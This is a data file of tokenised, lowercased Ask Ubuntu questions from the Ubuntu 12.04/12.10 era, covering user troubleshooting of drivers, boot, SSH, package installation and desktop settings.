214568	ca n't activate `` mirror display ''	i have ubuntu 12.04 on a dell latitude e6410 , i have a problem when using the vga output i always have dual monitor and ca n't switch on the `` mirror display '' toggle under systems setting/displays . it 's rather annoying when having to do presentation with a video projector . the option `` mirror display '' is in light grey and i can '' t tick the box . thanks for those who might have an idea how to resolve this ? update : driver is : intel速 ironlake mobile x86/mmx/sse2 card something like this ? description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz
214573	why ca n't i get firefox to close ?	firefox is already running , but is not responding . to open a new window , you must first close the existing firefox process , or restart your system . i keep getting this error message when i try to shut down firefox . it does not appear to be running on my desktop but my guess is that it is being used by another program in the background ( to send an error report , perhaps ) . how can i force firefox to completely close ?
214580	nx client ( win ) fonts not rendering after ubuntu upgrade	i 've just installed ubuntu 12.10 and no machine nx server ( 3 ) etc . i 've gone home , and have discovered that the windows nx client ( 3.5 ) will not display fonts for graphical applications . the same client works fine connecting to ubuntu 12.04 how can i fix this issue ?
214584	how do i get hud to work with gtk2 apps	i have a program which uses gtk2 that i want to integrate with hud called stata 12 . the menus are correctly located in the appmenu , but the menus do not show up in the hud . when i do use hud and try to search through the menus , the hud searches other open applications or system settings , but not stata itself . is there a way i can get it to integrate ? photos : apps in the appmenu being placed right : hud showing none of the options in the menu :
214588	xmodmap right ctrl to work as right shift	i 've tried searching a lot with no success . i know this can be done because i have done it before , but since then i 've reinstalled the os . i know that i used xmodmap to do this the last time . my reasoning for this is because both shift keys are broken on my laptop so i 've trained myself to use right-ctrl as right-shift . i know that my laptop has right-ctrl as keycode 105 . as far as i can tell left shift is keycode 50 and right shift is keycode 62 . i 've tried doing the following things : xmodmap -e 'keycode 105 = shift_r ' ( this shows the right-ctrl key as being right-shift under xev but pressing it actually does nothing ) xmodmap -e 'keycode 105 = 62 ' ( this outputs > ) xmodmap -e 'keycode 105 = 50 ' ( this outputs 2 ) can someone please show me what i need to do in order to make this work and make it work as a permanent change ? this is an unusable os for me until i can do this . i manged this in windows in just a few minutes ! : (
214591	ubuntu mounting windows raid0 hard disk	my windows os crashed and i booted ubuntu from a usb key to try to mount the raid0 hd from windows , i have tried many commands and software ( like mount ) but the hd dont get mount , any help would be really appreciated . regards
214601	how to tell if simplite is running ?	i installed simplite for pidgin ( im ) on ubuntu 12.10 . after installation i am wondering how to see whether simplite is up and running ? for installation for simplite see installing simp
214603	'gnome classic ' launches unity instead	i have previously installed the 'gnome-session-fallback ' package to get the standard gnome desktop instead of unity . i normally just select 'gnome classic ' when i log in . just now , i logged in with unity instead just to test it , and now i ca n't get back to gnome . if i select 'gnome classic ' on the login screen , i get unity instead . 'gnome classic ( no effects ) does launch gnome instead of unity , but i want the real thing . how can i have my gnome desktop back ?
214605	how can i display the current keyboard map on screen ?	i 'm using setxkbmap to switch between keyboard mappings english and hebrew : setxkbmap -option grp : lwin_toggle -option compose : rwin us , il i would like a little indicator of the current map on-screen . it could be as simple as `` il '' or `` us '' in the corner . how can i do this ? edit : i 'm not using unity , i 'm using fvwm2 .
214608	ubuntu boots to black screen after update	updated to 12.10 from .04 and set the graphics to light , since it was the default option i assumed that was the one i had always been using . so after the update the screen ends up in low graphics mode and i get a menu which i ca n't see , not wanting to make another uninformed decision , i google it , and find out that i just have to switch to gdm . low graphics mode after upgrade to 12.04 the final step was to run shutdown -r , this did n't work , it said something about not supplying time . so i manually shut it down assuming that it would lead to the same outcome . spoilers : it didn't it just boots to a black screen , i 'm guessing the gdm did n't install right . anyway i can fix this or is that all she wrote ?
214614	how can i reset the notifications ?	after i installed a xubuntu-session in addition to my existing ubuntu-session , eveytime i login to the ubuntu-session , the notify-bubbles appear with the xubuntu-theme . can i revert that somehow ?
214615	problems with 12.10 . ca n't find menu.lst in /boot/grub	i have asus 1225n and i 've installed ubuntu 12.10 but i have 2 major problems : sometimes when i restart the system after boot my touchpad and keyboard do n't work and i must reset 3 or 4 times when the system boot nothing , shows only purple screen without ubuntu logo and sometimes stucks at this page and i must reboot the system 2 or 3 times . i did n't find menu.lst in /boot/grub . is this problem occurred for missing menu.lst ? thanks for helping .
214619	does anyone know of a program like elastics for linux ?	on mac i would use elastics ( http : //tundrabot.com/elastics ) to kind of , monitor my ec2 instances . most important to me was that it worked across several accounts and that it allowed me to connect to a running instance via ssh or rdp . this was the only real feature i care about . i can not always keep the ip address of the server that is running because ec2 is elastic , and it changes frequently . is there any tool , like elastics for linux/unity ? again it should support several accounts and be able to give me the ip addresses of the instance i select .
214621	i can no longer activate wireless on my laptop	i had to reinstall ubuntu 12.04 lts on my hp compaq nc8230 . everything went fine , as before . i did a restart based on `` 197 updates '' , then while carrying the laptop , i pressed the key labeled 2 after this the wireless lan was deactivated and i 'm not able to activate it anymore ; not with the key and not with the option on the upper right corner of my desktop . now the sign looks like an empty triangle . iwconfig tells me that my interface 'eth1 ' has an wlan extension , which i already knew it had , because i used it before . but i have no clue how to activate it again ... can anyone suggest a fix ?
214623	how to access a windows share from ubuntu ?	in ubuntu 12.04 and previous versions , i can easily install smbfs and running smb : //server/share from nautilus works ! but , in 12.10 , i ca n't install smbfs . trying to install it from the terminal , i see this that the package is obsolete : reading package lists ... done building dependency tree reading state information ... done package smbfs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : cifs-utils e : package 'smbfs ' has no installation candidate how can access my windows share easily in 12.10 ?
214624	windows bootloader appears instead of grub	for the first time i have installed ubuntu onto an old windows 2000 system we have at work . i downloaded 12.04.1 and burned the .iso image to a disk . i loaded the cd , restarted the computer and went through the installation process . everything seemed to work fine throughout the installation . i got the installation complete popup and restarted my computer . after the restart , i was given no option to load ubuntu from the select os boot screen . the only option i have here is to load windows . i have tried to restart again but i still am not getting the option to load ubuntu . i loaded windows and looked at my computer and see that the hard drive space for windows is down to 25gb which is what i set for it to have when i installed ubuntu . when i look at the cd in explorer , i do see wubi.exe so i am assuming that the installation came from wubi . can someone lead me in the right direction as to why this may be happening ? i appreciate any and all help .
214634	using 12.04 installation as a persistent pen drive	disclaimer : i aim to build a self contained pen drive with our application inside for running it in as many machines as possible . portability . so no matter about updates . maybe i 'm looking at the wrong linux distribution to do this ... please let me know if you think so . i 've tried many knoppix and ubuntu flavors ( and still am trying many others ) but they do n't come with enough drivers for unity3d ( nothing to do with ubuntu 's unity ) to work - even lubuntu wo n't work ! i 'm betting it 's lack of opengl 2.0 support . creating a custom live persistent pen drive is a real pain and i 'm trying for 1 day without any success . sure , being able to do it would probably be ideal and occupy the minimum space . using the installation image on a pen drive , however , is good enough and is really easy to create . we can even do it from any os , using unetbootin , lili usb creator or some other methods . straight forward . some recommend installing it on a pen drive . but that requires way too much space ! almost 3gb , i can only use this if it 's 1gb at most . and , i believe , it wo n't behave as good as something meant to be installed on a usb disk , because of memory management and , again , drivers . the minimalcd installation does n't even recognize a wireless network / device on the first computer i 've tried . so , there are only a few negative points on using the installation image that i can think of . question here , is how to remove those drawbacks ( in order of importance ) : having to press `` try ubuntu '' . that 's the big one . could n't find how . unable to remove `` install ubuntu 12.04 lts '' app ( minor importance ) . unable to load everything on memory and keep on running without the pen drive ( like this ) . setting the iso to use maximum amount of space for the os will leave pen drive with zero space left and any file saved within it from ubuntu is inaccessible from the outside ( when plugging in the pen drive and not booting from it ) . the last 2 items are obviously not that important . am i missing something ? can those points be fixed ?
214635	bluetooth - ca n't browse files in ubuntu 12.10	i can send files to my phone , but i ca n't browse the files ... my bluetooth informations : ~ $ lsusb | grep bluetooth bus 002 device 003 : id 0a5c:21b4 broadcom corp. bcm2070 bluetooth 2.1 + edr is it a bug in ubuntu 12.10 ?
214642	how to force ubuntu to re-check for graphic drivers ?	everything was working perfectly fine on my ubuntu machine since i installed it almost a week ago ... until this morning . my computer has been running slow all day , particularly the dash ( and i mean really slow ) . i went to the system settings with the idea of changing my graphics driver to the proprietary one to see it it would fix the problem . surprise ! ubuntu does n't detect my graphic card anymore . i remember there being three options here ( at least one proprietary driver and one open source driver ) . is there a ( safe ) way i can force ubuntu to re-check the hardware without re-installing the whole system ? if it changes anything , the graphics card was from ati ( i do n't remember the model , but i could boot my `` legacy os '' to check if need be ) . thanks for your help , - calixte
214643	help with creating symbolic link	i 'm a little bit confused with how the symbolic links work . i hope someone can guide me in the right direction . i want to put a demo online from our software , which normally only runs locally on a mac mini . so i put all the files in the var/www from my ubuntu 12.04 server installation . there are a lot of hardcoded links in the software which point to /applications/xampp/xamppfiles/htdocs/narrowcasting of course i can change all these code on my html/php files in /var/www , but that would be quite annoying . i hope i can fix this by creating a symbolic link . for example i have a directory called thumb in /var/www/thumb . the php code is trying to put a image in /applications/xampp/xamppfiles/htdocs/narrowcasting/thumb . can anyone give me a tip how to achieve this with a symbolic link ?
214645	find which program caused a core dump file	i 've been going through intense program/package installation recently , so i ca n't tell for sure which of the newly installed programs ( or old programs ) caused the appearance of a core file in my home folder . it 's a server , so i better find out any possible sources of instability on the machine .
214646	how to configure the default automount location ?	i recently upgraded from mint 12 to ubuntu 12.10 + cinnamon . i have an external usb drive that when i plug it in , automatically mounts to /media/ [ username ] /backup/ . thing is , under mint , it did n't include the [ username ] portion . it just mounted to /media/backup . my question is , how do i switch back to that format ? i do n't need the drive mounted under my username . just under media . thanks in advance .
214647	unable to install google chrome	i receive this in my terminal when i try to install using wget https : //dl.google.com/linux/direct/google-chrome-stable_current_i386.deb sudo dpkg -i google-chrome* or sudo dpkg -- install /path/to/chrome.deb i receive selecting previously unselected package google-chrome-stable . ( reading database ... 146911 files and directories currently installed . ) unpacking google-chrome-stable ( from google-chrome-stable_current_i386.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on xdg-utils ( > = 1.0.2 ) . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : google-chrome-stable i then type sudo apt-get install -f and retry installation though it still does not install and i receive the same errors . i have also tried using : sudo apt-get install libxss1 libnspr4-0d libcurl3 though the above does n't work either .
214652	internet connection is very slow	i use gsm connection to surf internet . before i moved to ubuntu i used windows 7 os . it gave me good speed with gsm connection ( 100 kb/s ) . but now ubuntu gives me a very slow speed ( 2-3 kb/s ) . so it is difficult to use gsm connection . in my country ( sri lanka ) mobile broadband services are very expensive so i cant move to another one . if i use gsm connection they give me free data ( airtel connection ) . for me that is the main reason to use gsm connection . please , can anybody help me speed up my internet ? thanks .
214656	dolphin/nautilus both cause system wide freeze on access ntfs partition	ubuntu 12.04.1 , using either file manager to mount my windows 7 ntfs partition causes a system wide lock up . only solution is alt + sysrq + reisub . i 've run chkdsk /r on volume to no avail . anyone ?
214657	i ssh into server a with a common username , when i try to ssh into server b with passwordless i am asked for a password	the problem is that when other users login to server a with the same common username they are able to ssh into server b with passwordless login working . this means that it can not be a permissions problem with the common user on server a . my passwordless login to server b works from my local host but not after i login to the common user on server a . any ideas to what the issue could be would be appreciated . also let me know any extra info that may be needed .
214659	software updater fails to fetch and download	i am totally new to ubuntu and even though that i have some problems with it i like it a lot . and in the previous version i did solve quite some problems and i was happy that i could . but in 12.10 this is bugging me so much . i looked everywhere i just do n't know why i get this error , actually errors : w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] , w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . i have absolutely no idea what else to try . can somebody please help me ?
214663	ssh lost terminal colors	i have to computers with exactly the same configuration ( same ps1 etc ... ) . when i ssh from a to b the terminal correctly displays ps1 and file type colors ( i.e . blue directories , green executables etc . ) but when i ssh from b to a ps1 is set to default and colors disappear . furthermore , i created public keys to ssh without password from a to b and vice-versa . it works correctly from a to b but it does n't work from b to a , again i repeated the exact same procedure on both pc : on host a ssh-keygen ssh-copy-id -i ~/.ssh/id_rsa.pub address.to.host.b on host b ssh-keygen ssh-copy-id -i ~/.ssh/id_rsa.pub address.to.host.a what could be the problem ? edit : the problem is that when i ssh from b to a bash is not called in b . but why ?
214665	backup , clean install and restore	due to the route i came into ubuntu i now have 12.10 upgraded from 12.04 on an ntfs file system . i 've invested a lot of time getting everything as i want it , vis packages installed and settings , etc . i wonder if there is an easy method of : 1 backing up the whole system so that i can ; 2 do a squeaky clean install of 12.10 on ext4 with bells and whistles then ; 3 restore my backup so that my system behaves as it did before the reinstall ? sorry if this seems terribly obvious , but i do n't want to find all the problems when it 's too late . tia . to let you know how this went : used dpkg to list packages installed . backed up using deja dup . also manually backed up contents of /etc to include stuff that deja dup missed . cleanly installed restored deja dup backup and moved /etc contents back would not boot anymore . complained about graphics , offered basic graphics , stalled . repeated 3 and 4 above , but backed up clean /etc after install , then restored deja dup backup to /home/user but data ended up in /home/user/home/user . on closer inspection the two user directories have same inode but behave differently . can no longer log on . unable to write to .iceauthority . had to delete .iceauthority and establish user as owner of all files in user to log in successfully . copied contents of /home/user/home/user into /home/user . /home/user/home/user now empty . moved /home/user/home to trash . when i try to delete /home from trash it prepares to delete what looks like the contents of /home/user . closer inspection shows that /home/user has the same inode number as /home/user/.local/share/trash/files/user - can i unlink and delete the unneeded trash version ? tried to reinstall software using dpkg but all packages listed as not in the database . merde ! any way out of this ? and to make matters worse , deja dup seems to have completely emptied my ~/.local/share/evolution folders of all date . i have lost all my email . best to assume that this procedure is a non-starter and use more mundane methods a package at time .
214666	installing ubuntu 12.10 on new computer with windows 8	i recently purchased a new hp computer ( p6-2330 ) with windows 8 . i have tried unsuccessfully to install ubuntu 12.10 64bit alongside windows 8 . the computer is uefi with secure boot enabled . i 've tried following the instruction at https : //help.ubuntu.com/community/uefi . i am able to get the grub menu to show up . however , as soon as i press enter on either try ubuntu or install ubuntu , the screen goes blank . nothing works at all , not even the num lock or caps lock keys on the keyboard . i have to use the power button to restart the computer . does anyone have any suggestions on how to get ubuntu installed ? to clarify , i have actually tried installing using both a usb stick and a dvd . the usb stick gave a blank screen , while the dvd gave the error message `` empty security header '' after pressing enter at the grub screen .
214670	excluding results from synapse	synapse is showing all results from zeitgeist , locate , ... how do i exclude some private results from being displayed in synapse ? keep files from showing up ? the best would be an option to enter wildcards like `` *log '' that shouldnt be displayed in the search results
214671	mix sata and ide drives for dual boot	i have windows vista on a 180g ide hd . i have ubuntu 12.04 on a 320g sata hd . i want to put them in the same box and dual boot . how can i do this without goofing up ? the motherboard acer m1100 has one ide and the rest sata . it has a legal install . that is the motherboard i want to use .
214675	installing photoshop cs5 on ubuntu 12.10 using wine	i have a problem during installation of photoshop cs5 . when i open up the installer using wine , it appers , i make few steps , and when i get to the installation ( when the bar starts to move from left to right , and % .. you know ) it stops and writes an error . i tried to install the photoshop cs4 but it still will not install successfully . so please , if you can help me somehow , or post a link that will help me , please do it . p.s . : i do not want to use the other programs like gimp , or others , because they are not so good to me like photoshop . thank you ! ( btw : i am using ubuntu 12.10 , x64 , 4gb , 500gb hdd , 1gb nvidia 220m cuda , intel dual-core 2,2ghz ... )
214677	mobility radeon on ubuntu 12.10	10 ubuntu studio and can not get my ati radeon mobility 4650 to work . from lshw : *-display unclaimed description : vga compatible controller product : m96 [ mobility radeon hd 4650 ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 from lspci : 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) from lsmod : module size used by vesafb 13797 1 ip6t_reject 12574 1 xt_hl 12521 6 ip6t_rt 12558 3 nf_conntrack_ipv6 14054 7 nf_defrag_ipv6 13158 1 nf_conntrack_ipv6 ipt_reject 12541 1 xt_log 17349 10 bnep 18140 2 xt_limit 12711 13 xt_tcpudp 12603 18 rfcomm 42523 0 bluetooth 209256 10 bnep , rfcomm xt_addrtype 12635 4 parport_pc 32688 0 ppdev 17073 0 uvcvideo 76749 0 xt_state 12578 14 videobuf2_core 32851 1 uvcvideo videodev 120309 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12860 1 uvcvideo videobuf2_memops 13368 1 videobuf2_vmalloc ip6table_filter 12815 1 ip6_tables 27207 2 ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12665 0 joydev 17457 0 snd_hda_codec_hdmi 32007 1 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns snd_hda_codec_realtek 77876 1 nf_nat_ftp 12649 0 nf_nat 25254 1 nf_nat_ftp nf_conntrack_ipv4 14480 9 nf_nat nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 snd_hda_intel 33491 7 snd_hda_codec 134212 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel nf_conntrack_ftp 13359 1 nf_nat_ftp arc4 12529 2 snd_hwdep 13602 1 snd_hda_codec nf_conntrack 82633 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12810 1 snd_pcm 96580 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec ip_tables 26995 1 iptable_filter coretemp 13400 0 snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi iwlwifi 390922 0 snd_seq_midi_event 14899 1 snd_seq_midi lp 17759 0 kvm_intel 136907 0 snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event psmouse 95552 0 parport 46345 3 parport_pc , ppdev , lp x_tables 29711 13 ip6t_reject , xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables samsung_laptop 14532 0 snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq serio_raw 13215 0 mac_hid 13205 0 lpc_ich 17061 0 video 19335 1 samsung_laptop kvm 418206 1 kvm_intel snd 74638 24 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mac80211 544104 1 iwlwifi soundcore 15047 1 snd snd_page_alloc 18484 2 snd_hda_intel , snd_pcm microcode 22803 0 cfg80211 202470 2 iwlwifi , mac80211 binfmt_misc 17500 1 sky2 58111 0 can anyone help ? i have tried installing the driver from ati but when i run the aticonfig -- intial i get the following : aticonfig : no supported adapters detected the graphic modes were fine when i first installed but i tried to install the fglrx module and it all went pear shaped . i suspect that if i delete xorg.conf it will go back to normal but i want to have the ati command center . thanks , j .
214679	why are items missing from system settings ; how do i get them back ?	my settings window currently looks like this : obviously , a lot of items should be there and they are n't . they have been present before in xfce and in unity . i 've seen other questions about losing system settings completely , but both gnome-control-center and unity-desktop are completely installed and up to date on my system . what files/permissions affect what appears here , how might i resolve this ?
214682	video track length of canon legria hf m306 produced videos	i am having problems working with video clips produced by canon legria hf m306 . some tools seem to detect them as 25 fps progressive and other as 50 fps interlaced , it seems . the result is that , e.g. , blender , when it reads given .mts file , shows video track about twice the size of its own audio track . while vlc seems to be able to handle the file well enough and plays the .mts file at normal speed . how can i work with this ? is this a problem in some video library ? can i improve it ? can i somehow post-process the .mts files without re-encoding to fix this ? edit1 : it is blender 2.63 . the os is xubuntu 12.10 , quantal . http : //shell.sh.cvut.cz/~wilx/00143.mts is about 12mib file that exhibits the problem in blender . edit2 : the zoom to blur is what did record . it was just a test video . in both cases both mplayer and vlc say that the resulting video is 25 fps . from mplayer : video : [ h264 ] 1920x1088 24bpp 25.000 fps 6908.2 kbps ( 843.3 kbyte/s ) edit3 : here is some interesting output from mencoder : video stream : 6908.181 kbit/s ( 863522 b/s ) size : 11502122 bytes 13.320 secs 311 frames audio stream : 256.000 kbit/s ( 32000 b/s ) size : 198656 bytes 6.208 secs
214685	what does `unknown id` mean ?	when i start or reboot my ubuntu server i get a lot of messages starting this or that but towards the end i get a message unknown id : /home/kevin/riak-1.2.1/dev/dev1/bin/riak . i checked the < path > and it exists and is the same path as in the error message . i am thinking that this error comes from init.d and at this point in the boot up process the /home/kevin part of the path does n't exist yet or there is a permission problem . here is a copy of the ls -l output with an appended pwd : -rw-rw-r -- 1 kevin kevin 0 nov 8 12:08 ls.txt -rwx -- -- -- 1 kevin kevin 8531 sep 25 23:22 riak -rwx -- -- -- 1 kevin kevin 17710 sep 25 23:22 riak-admin -rwx -- -- -- 1 kevin kevin 2400 sep 25 23:22 search-cmd /home/kevin/riak-1.2.1/dev/dev1/bin the script that i suspect is at fault has these lines : su - /home/kevin/riak-1.2.1/dev/dev1/bin/riak -c `` $ daemon $ daemon_args '' || return 2 su - /home/kevin/riak-1.2.1/dev/dev2/bin/riak -c `` $ daemon $ daemon_args '' || return 2 su - /home/kevin/riak-1.2.1/dev/dev3/bin/riak -c `` $ daemon $ daemon_args '' || return 2 su - /home/kevin/riak-1.2.1/dev/dev4/bin/riak -c `` $ daemon $ daemon_args '' || return 2 if it is a permission problem please explain why the system can not execute/read these files .
214688	configuration of ldap client on 12.04	we have here a way to log in the computers base on ldap ( openldap ) . you can use any seat with the login/pass you have . well my problem is that everything worked fine till i had to upgrade ubuntu to the last version ( 12.04 ) . now , it is far from impossible to log in because you only can choose administrator account ! that would be my issue ; i want to lightdm allow me to choose the user e.g : pagonzalez or rmlago or whatever the login-name you have . iâ´ve been searching for 2 days now , and nothing comes up ! hope somebody here has any idea about it !
214689	installed kde on 12.04 , how do i remove gnome ?	after following this guide to install kde and trying it out for a while , i want to remove gnome ( unity , not 3 -- i 'm not sure if the distinction is majorly important or not ) . the problem is that the 'remove gnome ' command linked is actually the remove kde command -- and i ca n't find a way to remove gnome .
214690	`` system is running in low graphics mode ''	during the ubuntu set up i have to skip the connect to the internet part because there 's an `` internal error '' every time i try to connect . after skipping it , everything is fine until i need to restart at the end . when it boots back up i get an error saying it has to start in low graphics mode . i 've read other people 's solutions to this problem but none have worked for me . i have a 1gb amd radeon ( tm ) hd 7670m card and a amd quad-core a8-4500m .
214694	how to use ubuntu sso on joomla website ?	i 'm making a joomla website and i need to use ubuntu sso to allow users to login through it , i actually ca n't find any sort of extension to do so . thanks .
214703	use the unallocated space to expand windows ( ntfs partition )	here is a screenshot of what i see in gparted.. what can i do to expand my ntfs with that 20gb unallocated space ? i see no available options when i right click the unallocated space..
214707	update manager says : `` could not initialize the package information ''	here is the message it said to copy paste in a bug report : ( i do n't know how to run/send a bug report ) 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . '
214709	firefox : lastusedprinter not obeyed - ubuntu 12.04	related to : why firefox does not save my preferences in prefs.js ( i.e . printer headers , margins , etc. ) ? why does ubuntu not obey the lastusedprinter in firefox ? this works in other os 's . setting print_printer or print.print_printer has no effect . setting this in the prefs.js has no effect . what it does do -- - is revert back to the system default . i can understand making this the default behavior , but why ca n't this be changed to behave like it does in windows , for instance . i have some pos applications that need to silent print to a non-default printer . in windows/firefox , you simply print once from the non-default printer and this choice is remembered -- - ubuntu/firefox does n't remember and ca n't be forced either . what gives ? is this a bug or by design ?
214710	should i install drivers within a virtual machine created using gnome boxes ?	i 've installed windows 7 pro 64 bits in a virtual machine using gnome boxes . i 've never used a virtual machine before and i 'm wondering ... should i install some drivers within a virtual machine ? sound is working , display is decent even if i ca n't find my native resolution in windows ( 1280x800 instead of 1366x768 ) ... my guess is that gnome boxes is taking care of everything and i should n't mess with it . thank you for your answer , răšmi .
214711	can i customize only an application 's indicator icon ?	can i change this easystroke icon : but not change this one ? i 'm interested the general answer for any application , not one that is specific to easystroke .
214712	kvm : 'kvmvapic.bin ' : no such file or directory	i 'm trying to set up virtual machines with kvm and spice . every time i start a virtual machine it outputs an error and runs extremely slow . max @ tuxserver : ~ $ kvm-spice -hda vdisk.img -cdrom /media/main/transfer/cds/ubuntu-12.04-desktop-amd64.iso -boot d -m 1024 -vga cirrus -spice port=5900 , addr=192.168.0.1 , disable-ticketing do_spice_init : starting 0.10.0 spice_server_add_interface : spice_interface_migration spice_server_add_interface : spice_interface_keyboard spice_server_add_interface : spice_interface_mouse could not open option rom 'kvmvapic.bin ' : no such file or directory spice_server_add_interface : spice_interface_qxl red_worker_main : begin ensure_display_channel_created : create display channel ensure_cursor_channel_created : create cursor channel the cpu has amd-v . the os is ubuntu 12.04.1 x64 kernel 3.2.0-29 -- -- -- -- -- edit -- -- -- -- -- - kvm-ok prints : info : /dev/kvm exists kvm acceleration can be used and apt-file search kvmvapic.bin outputs nothing
214716	ca n't switch off system after creating new user account	i created a new user account , with user name and password . now , when i try to switch off my pc , from the top bar , it comes back to the login account screen . when i click the relevant option , it suspends , logs off user and restarts , but does not switch off . any solution ?
214720	watch tv on ubuntu with pci tv card ( tvtime no sound )	i have bought a pinnacle pci tv card : i also installed tvtime . i am able to see the multiple channels but there is no sound . after some googling i found this is a standard issue with tvtime . so far i tried the following ( none worked ) : running from terminal : tvtime -- mixer=hw:0/line sudo tvtime option -- device /dev/video0 | arecord -d hw:1,0 -r 32000 -c 2 -f s16_le | aplay - how to make sound to work ? you 'll get a really cold beer for it : )
214721	boot problem with 12.10 from dvd	i 'm a ubuntu newbie and i did a search on this problem without any luck but i do think that it might be a simple one . i created a iso boot dvd and at the start it looks like it works perfectly as i get the ubuntu logo and it runs for some time but then it freezes up and ends up with the message acpid : client connected from 2818 [ 0:0 ] acpid : 1 client rule loaded acpid : clinet connected from 2830 [ 0:0 ] acpid : 1 client rule loaded please can anyone help me ?
214722	software for manual audio transcription ( speech , interviews etc . )	is there any software that supports you to manually transcribe content from audio files ( like ogg , mp3 ) to text ?
214723	ultrabook convertibles that work fully with ubuntu ?	are there any ultrabook convertible laptops that work fully with ubuntu or can easily be made to fully work ? i would like a device like the lenovo yoga and the dell xps convertible that works fully or has been known to do so .
214731	i can not search/find any applications in the dash on 12.04	its been a while since i booted my ubuntu ( 12.04 ) , but when i did i had several updates ( over 100 ) and i installed them along with rebooting . these updates seemed to mess with my video driver but i seemed to have fixed this . my problem is that my applications do not show anywhere . i can open them via terminal or if there are shortcuts ( such as on the toolbar ) but if i hit super and go to apps , there is nothing . this is true if i hit super and search any app name nothing will come back ( except for files ) . i need help to understand what happened ! also for some reason i ca n't upgrade to 12.10 ( i assume because i have 12.04 and not 12.04.1 , which i do n't understand how to get ) .
214735	ca n't mount phone in 12.10	i used to be able to plug my phone in and it would be detected as a 32gb drive that i could copy e.g . music to . since 12.10 i ca n't do this ( message is that it wo n't mount the drive 'operation not supported ' . also i ca n't access my windows partitions , although i can see them . am i missing a setting somewhere ? ( linux softie user asking here ... )
214736	why is firefox scrolling faster with nouveau driver than with nvidia driver ?	i 'm really astonished that using the nvidia driver results in poor speed and high cpu usage when working with unity . i mean scrolling in firefox consumes 100 % cpu time and still is n't as fluid as it should be . nouveau is much better , but still far from being great . i tried the latest 310.14 beta and also all other versions of the nvidia drivers offered by jockey . can i do something about this ? i would really love scrolling in firefox without my fan making a lot of noise ...
214739	fixing windows7 bootmgr	i made my laptop dell xps 15z dual boot with ubuntu last year , and something went wrong & bootmgr of my windows got fried . i could n't fix it that time . and i kept using ubuntu . i do n't even remember whether i installed directly via a live usb or used wubi , sorry . i installed 11.10 at that point of time , but right now i am on 12.10 . today , i got to know about the boot repair tool , so i was wondering with this tool may be i can figure out what 's exactly wrong with my setup . this is my boot info - http : //paste.ubuntu.com/1343575/ if i select the win7 entry on grub2 , i get the error bootmgr is missing . press ctrl-alt-del . now the thing is i have read numerous links on how this could be fixed , but i do n't feel comfortable without knowing what i am doing . so unless i am sure what a certain tool would do , i would prefer fixing it by hand ( manually editing files ) . so reading from my boot info file , can anyone explain it to me what 's messed up wrong here and what could fix it ? i certainly ca n't afford to have my ubuntu install unbootable right now , but looking into this issue is bothering me too much . help appreciated ! i have win7 dvd & ubuntu live usbs with me , i am just looking for a sure shot way of fixing win7 without any harm to my existing ubuntu install .
